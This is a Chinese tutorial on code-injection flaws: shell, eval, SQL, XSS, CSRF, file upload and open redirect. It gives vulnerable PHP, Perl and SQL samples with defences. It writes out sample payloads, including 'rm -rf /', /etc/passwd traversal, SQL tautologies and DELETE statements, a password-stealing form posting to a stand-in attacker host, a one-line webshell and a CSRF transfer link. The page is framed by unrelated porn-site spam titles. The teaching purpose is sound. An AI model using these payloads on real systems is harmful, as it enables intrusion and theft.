精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

程序員疫苗:代碼注入

開發(fā) 前端 后端
很多程序上錯誤就 像人類世界的病毒一樣,我們應該給我們的新入行的程序員注射一些疫苗,就像給新生兒打疫苗一樣,希望程序員從入行時就對這些錯誤有抵抗力。

幾個月在我的微博上說過要建一個程 序員疫苗網站,希望大家一起來提交一些錯誤示例的代碼,來幫助我們新入行的程序員,不要讓我們的程序員一代又一代的再重復地犯一些錯誤。很多程序上錯誤就 像人類世界的病毒一樣,我們應該給我們的新入行的程序員注射一些疫苗,就像給新生兒打疫苗一樣,希望程序員從入行時就對這些錯誤有抵抗力。

我的那個疫苗網站正在建議中(不好意思拖了很久),不過,我可以先寫一些關于程序員疫苗性質的文章,也算是熱熱身。希望大家喜歡,先向大家介紹第一注疫苗——代碼注入。

Shell注入

我們先來看一段perl的代碼:

  1. use CGI qw(:standard); 
  2. $name = param('name'); 
  3. $nslookup = "/path/to/nslookup"
  4. print header; 
  5. if (open($fh, "$nslookup $name|")) { 
  6.     while (<$fh>) { 
  7.         print escapeHTML($_); 
  8.         print "<br>\n"
  9.     } 
  10.     close($fh); 

如果用戶輸入的參數(shù)是:

  1. coolshell.cn%20%3B%20/bin/ls%20-l 

那么,這段perl的程序就成了:

  1. /path/to/nslookup coolshell.cn ; /bin/ls -l 

我們再來看一段PHP的程序:

  1. $myvar = 'somevalue';  
  2. $x = $_GET['arg'];  
  3. eval('$myvar = ' . $x . ';');  

eval“的參數(shù)將會視同PHP處理,所以額外的命令可被添加。例如:如果”arg”如果被設成”10; system('rm -rf /')“,后面的”system('rm -rf /')“代碼將被運行,這等同在服務器上運行開發(fā)者意料外的程序。(關于rm -rf /,你懂的,可參看“一個空格引發(fā)的悲劇”)

再來看一個PHP的代碼

  1. $isadmin= false; 
  2. ... 
  3. ... 
  4. foreach ($_GET as $key => $value) { 
  5.   $$key = $value

如果攻擊者在查詢字符串中給定”isadmin=1″,那$isadmin將會被設為值 “1″,然后攻擊值就取得了網站應用的admin權限了。

再來看一個PHP的示例:

  1. $action = 'login'
  2.    if (__isset( $_GET['act'] ) ) 
  3.       $action = $_GET['act']; 
  4.    require$action . '.php' ); 

這個代碼相當危險,攻擊者有可能可以干這些事:

  • /test.php?act=http://evil/exploit - 注入遠程機器上有漏洞的文件。
  • /test.php?act=/home/www/bbs/upload/exploit - 從一個已經上載、叫做exploit.php文件運行其代碼。
  • /test.php?act=../../../../etc/passwd%00 - 讓攻擊者取得該UNIX系統(tǒng)目錄檢索下密碼文件的內容。一個使用空元字符以解除.php擴展名限制,允許訪問其他非 .php 結尾文件。 (PHP默認值”magic_quotes_gpc = On”可以終止這種攻擊)

這樣的示例有很多,只要你的程序有諸如:system()StartProcess()java.lang.Runtime.exec()System.Diagnostics.Process.Start()以及類似的應用程序接口,都是比較危險的,最好不要讓其中的字符串去拼裝用戶的輸入。

PHP提供escapeshellarg()escapeshellcmd()以在調用方法以前進行編碼。然而,實際上并不建議相信這些方法是安全的 。

SQL注入

SQL injection,是發(fā)生于應用程序之數(shù)據(jù)庫層的安全漏洞。簡而言之,是在輸入的字符串之中注入SQL指令,在設計不良的程序當中忽略了檢查,那么這些注入進去的指令就會被數(shù)據(jù)庫服務器誤認為是正常的SQL指令而運行,因此遭到破壞。

在應用程序中若有下列狀況,則可能應用程序正暴露在SQL Injection的高風險情況下:

  1. 在應用程序中使用字符串聯(lián)結方式組合SQL指令(如:引號沒有轉義)。
  2. 在應用程序鏈接數(shù)據(jù)庫時使用權限過大的帳戶(如:很多開發(fā)人員都喜歡用sa(最高權限的系統(tǒng)管理員帳戶)連接Microsoft SQL Server數(shù)據(jù)庫)。
  3. 在數(shù)據(jù)庫中開放了不必要但權力過大的功能(例如在Microsoft SQL Server數(shù)據(jù)庫中的xp_cmdshell延伸預存程序或是OLE Automation預存程序等)
  4. 過于信任用戶所輸入的數(shù)據(jù),未限制輸入的字符數(shù),以及未對用戶輸入的數(shù)據(jù)做潛在指令的檢查。

例程:

某個網站的登錄驗證的SQL查詢代碼為

  1. strSQL = "SELECT * FROM users 
  2. WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');" 

用戶在登錄時惡意輸入如下的的用戶名和口令:

  1. userName = "' OR '1'='1";
  1. passWord = "' OR '1'='1"

也就是實際上運行的SQL命令會變成下面這樣的,因此導致無帳號密碼,也可登錄網站。

  1. strSQL = "SELECT * FROM users;" 

這還不算惡劣的,真正惡劣的是在你的語句后再加一個自己的語句,如:

  1. username= "' ; DELETE FROM users; --"

這樣一來,要么整個數(shù)據(jù)庫的表被人盜走,要么被數(shù)據(jù)庫被刪除。

所以SQL注入攻擊被俗稱為黑客的填空游戲。你是否還記得酷殼這篇文章里的SQL注入?

#p#

[[76168]]

當他們發(fā)現(xiàn)一個網站有SQL注入的時候,他們一般會干下面的事:

  • 盜取數(shù)據(jù)表中的數(shù)據(jù),例如個人機密數(shù)據(jù)(信用卡,身份證,手機號,通訊錄……),帳戶數(shù)據(jù),密碼等,獲得用戶的數(shù)據(jù)和信息后對這些用戶進行“社會工程學”活動(如:我前兩天在微信上親身經歷)。
  • 取得系統(tǒng)管理員權限(例如ALTER LOGIN sa WITH PASSWORD=’xxxxxx’)。
  • 在數(shù)據(jù)庫中的數(shù)據(jù)中插入一些HTML/JS代碼,有可能得以在網頁加入惡意鏈接以及XSS,這樣一來就讓訪問者被黑。
  • 經由數(shù)據(jù)庫服務器提供的操作系統(tǒng)支持,讓黑客得以修改或控制操作系統(tǒng)(例如:MS SQL Server的 xp_cmdshell “net stop iisadmin”可停止服務器的IIS服務)。甚至破壞硬盤數(shù)據(jù),癱瘓全系統(tǒng)(例如xp_cmdshell “FORMAT C:”)。

現(xiàn)在的黑客比較壞,癱瘓系統(tǒng)的事,他們干的越來越少,因為沒什么利益,他們希望通過獲取用戶的帳號信息后,轉而攻擊用戶別的帳號,如游戲帳號,網銀帳號,QQ帳號等等他們可以獲利的事情(這就是為什么我希望大家在不站點上使用不同的口令,甚至不同的用戶信息的原因)

如何避免

  • 在組合SQL字符串時,先針對所傳入的參數(shù)作字符轉義(如:將單引號字符取代為連續(xù)2個單引號字符)。如果使用PHP開發(fā)網頁程序的話,亦可打開PHP的Magic quote功能自動將所有的網頁傳入?yún)?shù),將單引號字符取代為連續(xù)2個單引號字符。如果可能應該過濾以下字符:分號“;”,兩個減號“–”,單引號“’”,注釋“/* … */”。(當然,因為注入攻擊一般用閉合的引號來玩,所以把引號轉義了應該就沒有什么問題了)
  • 更換危險字符。例如在PHP通過addslashes()函數(shù)保護SQL注入。
  • 限制用戶輸入的長度,限制用戶輸入的取值范圍。
  • 為當前應用建立權限比較小的數(shù)據(jù)庫用戶,這樣不會導致數(shù)據(jù)庫管理員丟失。
  • 把數(shù)據(jù)庫操作封裝成一個Service,對于敏感數(shù)據(jù),對于每個客戶端的IP,在一定時間內每次只返回一條記錄。這樣可以避免被拖庫。

跨網站腳本注 入

跨網站腳本Cross-site scripting,通常簡稱為XSS或跨站腳本或跨站腳本攻擊)是一種網站應用程序的安全漏洞攻擊,是代碼注入的一種。它通過巧妙的方法注入惡意指令代 碼到網頁,使用戶加載并執(zhí)行攻擊者惡意制造的網頁程序。這些惡意網頁程序通常是JavaScript,但實際上也可以包括 Java, VBScript, ActiveX, Flash 或者甚至是普通的HTML。攻擊成功后,攻擊者可能得到包括但不限于更高的權限(如執(zhí)行 一些操作)、私密網頁內容、會話和cookie等各種內容。

假如我們有這樣一段PHP的代碼:

  1. $username = $_GET['username']; 
  2. echo '<div> Welcome, ' . $username . '</div>'


么我們可以這樣來注入:

http://trustedSite.example.com/welcome.php?username=<Script Language=”Javascript”>alert(“You’ve been attacked!”);</Script>

甚至這樣:

http://trustedSite.example.com/welcome.php?username=<div id=”stealPassword”>Please Login:<form name=”input” action=”http://attack.example.com/stealPassword.php” method=”post”>Username: <input type=”text” name=”username” /><br/>Password: <input type=”password” name=”password” /><input type=”submit” value=”Login” /></form></div>

這會讓網頁顯示以下內容:

  1. <div class="header"> Welcome, 
  2.     <div id="stealPassword">Please Login: 
  3.         <form name="input" action="attack.example.com/stealPassword.php" method="post"> 
  4.             Username: <input type="text" name="username" /> 
  5.             <br/> 
  6.             Password: <input type="password" name="password" /> 
  7.             <input type="submit" value="Login" /> 
  8.         </form> 
  9.     </div> 
  10. </div> 

注入的代碼還有可能變種為如下這種更為隱蔽的方式(unicode碼):

#p#

trustedSite.example.com/welcome.php?username=<script+type=”text/javascript”>
document.write(‘\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073
\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064
\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067
\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D
\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063
\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F
\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D
\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061
\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068
\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070
\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D
\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061
\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065
\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073
\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075
\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073
\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022
\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E
\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D
\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C
\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F
\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D’);</script>

XSS的攻擊主要是通過一段JS程序得用用戶已登錄的cookie去模擬用戶的操作(甚至偷用戶的cookie)。這個方式可以讓用戶在自己不知情的情況下操作了自己不期望的操作。如果是網站的管理員中招,還有可能導致后臺管理權限被盜。關于其中的一些細節(jié)可以參看《新浪微博的XSS攻擊》一文。XSS攻擊是程序員有一糊涂就很容易犯的錯誤,你還可以看看網上的《騰訊微博的XSS攻擊》。

XSS攻擊在論壇的用戶簽檔里面(使用img標簽)也發(fā)生過很多次,包括像一些使用bcode的網站,很有可能會被注入一些可以被瀏覽器用來執(zhí)行的代碼。包括CSS都有可能被注入javascript代碼。

不要以為XSS攻擊是我們的程序沒有寫好,有時候,我們會引用別人站點上的js文件,比如:放一個天氣預報的小Widget的js,或是一個流量監(jiān)控,或是一段廣告的js文件。你不知道這些東西是不是有問題,如果有惡意的話,這就是你自己主動注入攻擊代碼了。

另外,XSS攻擊有一部分是和瀏覽器有關的。比如,如下的一些例子,你可能從來都沒有想過吧?(更多的例子可以參看酷殼很早以前的這篇文章《瀏覽器HTML安全列表》

  1. <table background=”javascript:alert(1)”> 
  2.   
  3. <meta charset=”mac-farsi”>¼script¾alert(1)¼/script¾ 
  4.   
  5. <img src=”javascript:alert(1)”> 

XSS攻擊通常會引發(fā)CSRF攻擊。CSRF攻擊主要是通過在A站上設置B站點上的鏈接,通過使用用戶在B站點上的登錄且還沒有過期的 cookie,從而使得用戶的B站點被攻擊。(這得益于現(xiàn)在的多Tab頁的瀏覽器,大家都會同時打開并登錄很多的網站,而這些不同網站的頁面間的 cookie又是共享的)

于是,如果我在A站點內的某個貼子內注入這么一段代碼:

  1. <img src="http://bank.example.com/transfer?account=XXX&amount=1000000&for=haoel"> 

很有可能你就在訪問A站的這個貼子時,你的網銀可能向我轉了一些錢。

如何避免

要防止XSS攻擊,一般來說有下面幾種手段:

  • 嚴格限制用戶的輸入。最好不要讓用戶輸入帶標簽的內容。最好不要讓用戶使用一些所見即所得的HTML編輯器。
  • 嚴格過濾用戶的輸入。如:
    • PHP的htmlentities()或是htmlspecialchars()或是strip_tags()
    • Python的cgi.escape()
    • ASP的Server.HTMLEncode()
    • Node.js的node-validator。
    • Java的xssprotect。
  • 在一些關鍵功能,完全不能信任cookie,必需要用戶輸入口令。如:修改口令,支付,修改電子郵件,查看用戶的敏感信息等等。
  • 限制cookie的過期時間。
  • 對于CSRF攻擊,一是需要檢查http的reference header。二是不要使用GET方法來改變數(shù)據(jù),三是對于要提交的表單,后臺動態(tài)生成一個隨機的token,這個token是攻擊者很難偽造的。(對于token的生成,建議找一些成熟的lib庫)

另外,你可能覺得網站在處理用戶的表單提交就行了,其實不是,想一想那些Web Mail,我可以通過別的服務器向被攻擊用戶發(fā)送有JS代碼、圖片、Flash的郵件到你的郵箱,你打開一看,你就中招了。所以,WebMail一般都禁止顯示圖片和附件,這些都很危險,只有你完全了解來源的情況下才能打開。電子郵件的SMTP協(xié)議太差了,基本上無法校驗其它郵件服務器的可信度,我甚至可以自己建一個本機的郵件服務器,想用誰的郵件地址發(fā)信就用誰的郵件地址發(fā)信所以,我再次真誠地告訴大家,請用gmail郵箱。別再跟我說什么QQMail之類的好用了。

#p#

上傳文件

上傳文件是一個很危險的功能,尤其是你如果不校驗上傳文件的類型的話,你可能會中很多很多的招,這種攻擊相當狠。試想,如果用戶上傳給你一個PHP、ASP、JSP的文件,當有人訪問這個文件時,你的服務器會解釋執(zhí)行之,這就相當于他可以在你的服務器上執(zhí)行一段程序。這無疑是相當危險的。

舉個例子:

  1. <form action="upload_picture.php" method="post" enctype="multipart/form-data"> 
  2. 要上傳的文件: 
  3. <input type="file" name="filename"/> 
  4. <br/> 
  5. <input type="submit" name="submit" value="Submit"/> 
  6. </form> 

后臺上傳文件的PHP程序

  1. $target = "pictures/" . basename($_FILES['uploadedfile']['name']); 
  2. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target)){ 
  3.     echo "圖片文件上傳成功"
  4. }else{</div> 
  5.     echo "圖片文件上傳失敗"

假如我上傳了一個PHP文件如下:

文件名malicious.php

  1. <?php 
  2. system($_GET['cmd']); 
  3. ?> 

那么,我就可以通過如下的URL訪問攻擊你的網站了:

  1. http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l 

抵御這樣的攻擊有兩種手段:

1)限制上傳文件的文件擴展名。

2)千萬不要使用root或Administrator來運行你的Web應用。

URL跳轉

URL跳轉很有可能會成為攻擊利用的工具。

比如下面的PHP代碼:

  1. $redirect_url = $_GET['url']; 
  2. header("Location: " . $redirect_url); 

這樣的代碼可能很常見,比如當用戶在訪問你的網站某個頁觀的時候沒有權限,于是你的網站跳轉到登錄頁面,當然登錄完成后又跳轉回剛才他訪問的那個頁面。一般來說,我們都會在跳轉到登錄頁面時在URL里加上要被跳轉過去的網頁。于是會出現(xiàn)上述那樣的代碼。

于是我們就可以通過下面的URL,跳轉到一個惡意網站上,而那個網站上可能有一段CSRF的代碼在等著你,或是一個釣魚網站。

  1. http://bank.example.com/redirect?url=http://attacker.example.net 

這種攻擊具有的迷惑性在于,用戶看到的http://bank.example.com,以為是一個合法網站,于是就點了這個鏈接,結果通過這個合法網站,把用戶帶到了一個惡意網站,而這個惡意網站上可能把頁面做得跟這個合法網站一模一樣,你還以為訪問的是正確的地方,結果就被釣魚了

解決這個問題很簡單,你需要在你的后臺判斷一下傳過來的URL的域名是不是你自己的域名。

你可以看看Google和Baidu搜索引擎的鏈接跳轉,百度的跳轉鏈接是被加密過的,而Google的網站鏈接很長,里面有網站的明文,但是會有幾個加密過的參數(shù),如果你把那些參數(shù)移除掉,Google會顯示一個重定向的提醒頁面。(我個人覺得還是Google做得好)

原文鏈接:http://coolshell.cn/articles/8711.html

責任編輯:陳四芳 來源: 酷殼網
相關推薦

2009-09-27 09:39:19

2017-03-13 09:07:05

測定代碼基因

2010-08-11 09:51:28

Flex代碼

2017-10-20 13:28:50

2012-03-06 09:22:46

程序員

2013-08-20 09:33:59

程序員

2009-05-21 15:58:12

程序員工作經驗職場

2011-05-13 14:34:02

程序員

2019-05-15 09:59:24

程序員技能開發(fā)者

2009-12-28 09:42:14

程序員

2011-05-10 09:29:30

代碼重寫

2009-12-10 17:05:10

Visual Stud

2015-08-25 15:54:17

程序員代碼生成器

2020-12-28 14:20:24

程序員代碼開發(fā)者

2009-12-03 16:50:58

Visual Basi

2015-06-17 14:24:48

優(yōu)秀程序員整潔代碼

2021-05-18 15:17:52

印度疫苗疫情

2015-04-10 19:37:34

程序員

2022-03-16 11:10:19

程序員社區(qū)技術

2013-07-12 10:58:16

程序員
點贊
收藏

51CTO技術棧公眾號

青青青在线视频免费观看| 欧美精品一区二区三区在线看午夜| 91久久久久久久久久久久久久| 四虎在线精品| 亚洲无线码一区二区三区| 久久伊人资源站| 中文字幕第三页| 国内自拍一区| 综合国产在线视频| 色综合久久五月| 久久99国产精品二区高清软件| 一区二区三区四区国产精品| 欧美一区二区三区在线播放| 国产模特av私拍大尺度| 香蕉亚洲视频| 久久99久久99精品免观看粉嫩| av在线网站观看| 嫩呦国产一区二区三区av| 欧美日韩中文字幕在线视频| 国产对白在线播放| 狠狠狠综合7777久夜色撩人| 国产乱一区二区| 国产国产精品人在线视| 久久久无码一区二区三区| 欧美日韩性在线观看| 亚洲成人黄色在线| 亚洲第一区第二区第三区| 中文字幕色婷婷在线视频 | www.99re6| 视频一区中文| 亚洲精品成a人在线观看| 五月天开心婷婷| 精品无人乱码一区二区三区 | 潘金莲一级淫片aaaaaa播放1| 日本一级在线观看| www.亚洲精品| 国产精品国产亚洲精品看不卡15| 一级黄色小视频| 麻豆精品网站| 热99在线视频| 国产精品一区二区6| 欧美日韩视频| 欧美另类老女人| 中国毛片直接看| 久久久久久久久久久妇女| 中文字幕亚洲图片| 中文字幕黄色网址| 国产探花一区在线观看| 亚洲精品视频网上网址在线观看| 美女黄色一级视频| 6080亚洲理论片在线观看| 欧美一区二区三区啪啪| 亚洲一区二区在线视频观看| 丁香婷婷久久| 欧美日韩成人综合在线一区二区| 天堂在线资源视频| 99久久亚洲国产日韩美女 | 久久久久免费精品| 成人av观看| 日韩欧美国产骚| 亚洲熟妇av一区二区三区| 欧美极品影院| 在线视频你懂得一区二区三区| aaa毛片在线观看| 国产一区二区三区朝在线观看| 欧美在线不卡视频| 老司机午夜性大片| 亚洲1区在线观看| 亚洲护士老师的毛茸茸最新章节| 日韩免费高清一区二区| 伊人精品一区| 一区二区三区视频免费在线观看| 青青青视频在线播放| 国产精品毛片久久| 九九热精品视频| 中文字幕一区二区三区精品| 国产视频一区三区| 国产精品高潮呻吟久久av无限| 美女黄页在线观看| 国产伦精品一区二区三区免费迷| 国产精品三区在线| 免费福利在线观看| 综合欧美一区二区三区| 欧美日韩激情四射| 少妇视频一区| 欧美四级电影网| 韩国一区二区三区四区| 香蕉视频一区二区三区| 日韩在线免费高清视频| 精品午夜福利视频| 日韩精品色哟哟| 亚洲aⅴ男人的天堂在线观看| 欧美一级特黄aaaaaa| 国产丝袜在线精品| av磁力番号网| 这里有精品可以观看| 欧美日韩国产高清一区二区三区| 亚洲精品成人无码毛片| 欧美性感美女一区二区| 欧美日韩国产123| 国产免费一级视频| 国产精品自拍一区| 欧美另类网站| 欧美极品少妇videossex| 色激情天天射综合网| 成年人性生活视频| 欧美日韩伦理在线免费| 97精品一区二区三区| 91精品国自产| 91麻豆国产在线观看| 99精品一级欧美片免费播放| 欧美xxx性| 精品国产免费人成在线观看| 亚洲一级黄色录像| 欧美一级一区| 国产精品9999久久久久仙踪林| 午夜福利视频一区二区| 亚洲欧美成人一区二区三区| 日韩av一二三四| 老牛精品亚洲成av人片| 欧美人与物videos| 在线观看国产小视频| 337p粉嫩大胆色噜噜噜噜亚洲| www.黄色网址.com| 欧美久久久网站| 亚洲丝袜在线视频| 三级黄色在线视频| 成人综合激情网| 福利网在线观看| 欧美韩国日本| 中文字幕欧美精品日韩中文字幕| 国产又大又黑又粗免费视频| 国产成人av福利| 久久久成人精品一区二区三区| 日韩欧美一区二区三区免费观看| 亚洲国产成人av在线| 精品一级少妇久久久久久久| 国内国产精品久久| 最新av在线免费观看| 欧美日韩va| 国产一区二区日韩精品欧美精品| 午夜影院免费在线观看| 91最新地址在线播放| 国产高清www| 国产精品毛片av| 久久久久久久久爱| 成人精品在线播放| 亚洲午夜电影网| 水蜜桃av无码| 久久国产高清| 欧美日韩国产综合视频在线| 日韩电影免费看| 亚洲欧美成人精品| 99re国产在线| 国产精品美女久久久久久久久久久 | 日韩一二三区不卡| 亚洲国产精品一区二区久久hs| 国产日韩欧美三级| 欧美日韩一区二区三| 免费电影日韩网站| 国产一区二区三区在线播放免费观看 | 亚洲 欧美 中文字幕| 91免费看片在线观看| 欧美极品欧美精品欧美| 色天天色综合| 国产成人在线精品| 日韩精品成人av| 欧美一区欧美二区| 国产无遮无挡120秒| 不卡一卡二卡三乱码免费网站| 久久精品视频16| 欧美精品系列| 91在线观看免费网站| 激情在线视频播放| 精品亚洲国产视频| 中文字幕在线观看1| 亚洲视频在线一区| 水蜜桃av无码| 裸体在线国模精品偷拍| 国产一级片91| 米奇777超碰欧美日韩亚洲| 国产在线观看91精品一区| 1区2区在线观看| 日韩精品在线电影| 97精品人妻一区二区三区在线| 亚洲精品综合在线| 大地资源二中文在线影视观看| 免费看欧美美女黄的网站| 中文字幕乱码免费| 日韩精品免费一区二区三区竹菊| 国产精品久久久久免费a∨大胸| 免费观看在线黄色网| 亚洲国产精品99久久| 中文字幕人妻色偷偷久久| 亚洲一区二区三区中文字幕| 亚洲精品视频久久久| 精品在线免费观看| 欧美亚洲另类色图| 久久久久av| 日本精品一区二区三区高清 久久 日本精品一区二区三区不卡无字幕 | 性高潮久久久久久久| 国模一区二区三区白浆| 欧美性大战久久久久xxx| 欧美三级美国一级| av激情久久| 欧美a视频在线| 2019中文字幕在线观看| 黄网站app在线观看| 日韩成人黄色av| 亚洲中文字幕一区二区| 精品成人av一区| 亚洲欧美一区二区三区四区五区| 久久先锋影音av鲁色资源网| 一区二区三区人妻| 美女爽到高潮91| 男人日女人bb视频| 午夜电影亚洲| 先锋影音亚洲资源| 台湾色综合娱乐中文网| 91在线看网站| 日本成人一区二区| 国产精品xxxxx| 日本在线播放一二三区| 午夜精品福利在线观看| 丝袜在线观看| 成人444kkkk在线观看| 在线观看黄色av| 亚洲一区二区久久| 免费播放片a高清在线观看| 亚洲国产成人av在线| 亚洲av无码乱码国产麻豆| 欧美疯狂性受xxxxx喷水图片| 一级一级黄色片| 91福利在线播放| 国产婷婷色一区二区在线观看 | 人妻无码一区二区三区四区| 999国产精品永久免费视频app| 日韩欧美手机在线| 国产欧美一区二区精品久久久| 欧美精品尤物在线| 亚洲毛片免费看| 久久资源亚洲| 香蕉国产成人午夜av影院| 九九99玖玖| 欧美网色网址| 欧美主播一区二区三区美女 久久精品人 | 国产精品一区二区三区av麻| 国内视频一区| 日日狠狠久久偷偷综合色| 久久久com| 国偷自产av一区二区三区| 国产欧美日韩综合一区在线观看 | 精品日本一区二区三区在线观看| av男人一区| 国产一区不卡在线观看| 欧美一区 二区| 欧美精品一区二区视频 | a级片一区二区| 亚洲欧美亚洲| 日韩五码在线观看| 免费在线亚洲欧美| 污污的网站18| 日本美女一区二区三区| 天美星空大象mv在线观看视频| 男女男精品视频网| 久久婷婷中文字幕| 成人福利在线看| 国产中年熟女高潮大集合| 欧美激情在线观看视频免费| a一级免费视频| 亚洲一区二区三区精品在线| 成人毛片在线播放| 欧美日韩综合色| 精品久久久久久亚洲综合网站| 欧美mv和日韩mv国产网站| 天堂中文在线视频| 精品亚洲永久免费精品| 日韩黄色影院| 国内精品一区二区三区| 另类中文字幕国产精品| 成人亲热视频网站| 精品中国亚洲| 亚洲人一区二区| 亚洲精品在线二区| www欧美激情| 岛国精品一区二区| 91资源在线播放| 亚洲永久免费av| 无码人妻av一区二区三区波多野| 欧美高清hd18日本| 四虎在线视频| 久久福利视频导航| 黑人巨大亚洲一区二区久 | 国产综合久久久| 精品免费久久久久久久| 久久99伊人| 少妇欧美激情一区二区三区| 久久网这里都是精品| 天天看片中文字幕| 色婷婷综合激情| 亚洲精品一级片| 中文字幕欧美精品在线| 国产一二三在线| 91精品视频免费| 欧美亚洲在线日韩| 国产美女网站在线观看| 精品亚洲免费视频| 久久精品国产亚洲av久| 亚洲一区av在线| 国产一区二区小视频| 亚洲男人av在线| www欧美xxxx| 亚洲www在线| 97精品一区| 爱情岛论坛成人| 99国产精品一区| 久久久久噜噜噜亚洲熟女综合| 欧美亚洲综合久久| 免费在线黄色电影| 午夜精品视频网站| 97人人澡人人爽91综合色| 一区二区三区在线观看www| 日韩和的一区二区| ass精品国模裸体欣赏pics| 亚洲一二三区不卡| av免费观看在线| 久久精品国产一区二区电影| 成人不卡视频| 久久精品中文字幕一区二区三区 | 免费看av成人| 免费在线观看亚洲视频| 成人免费毛片app| 懂色av懂色av粉嫩av| 欧美美女激情18p| 五月婷婷在线观看| 国产精品一区二区性色av | 国产69精品久久| 日本在线观看一区二区三区| 蘑菇福利视频一区播放| 制服丝袜第二页| 好吊成人免视频| 四虎影视2018在线播放alocalhost| 久久久在线观看| 国产一区二区三区不卡av| 久无码久无码av无码| gogogo免费视频观看亚洲一| 亚洲欧美在线观看视频| 亚洲国产精品嫩草影院久久| 超碰97免费在线| 精品久久久三级| 免费日韩av片| av黄色在线免费观看| 欧美性猛交xxxx黑人交| 麻豆视频网站在线观看| 亚洲综合在线小说| 黄色成人在线网站| 亚洲调教欧美在线| 色哟哟欧美精品| 欧美jizz18性欧美| 91在线看网站| 亚洲一区激情| 国内精品卡一卡二卡三| 欧美日韩激情在线| 性爱视频在线播放| 国产无套精品一区二区| 久久精品日韩欧美| 亚洲欧美精品久久| 精品精品国产高清a毛片牛牛 | 在线一区免费观看| 在线国产视频一区| 欧美日韩成人在线一区| 麻豆av在线播放| 欧美xxxx黑人又粗又长密月| 日韩1区2区3区| 久久久久97国产| 亚洲毛片在线看| 开心久久婷婷综合中文字幕 | 久久一综合视频| 波多野结衣久久久久| 精品国产一区二区三区四区四| 91久久国产综合久久91猫猫| 一区二区三区观看| 高清不卡在线观看av| 在线观看日本网站| 久久综合伊人77777尤物| 精品欧美午夜寂寞影院| 国产成人黄色网址| 亚洲国产精品天堂| av二区在线| 精品1区2区| 久久99精品国产麻豆婷婷| 日韩经典在线观看| 久久精品国产欧美亚洲人人爽| 加勒比中文字幕精品| 日日干夜夜操s8| 精品国产乱码久久久久久婷婷| 嫩草在线视频| 免费国产一区二区| 国产美女精品一区二区三区| 日本免费在线观看视频|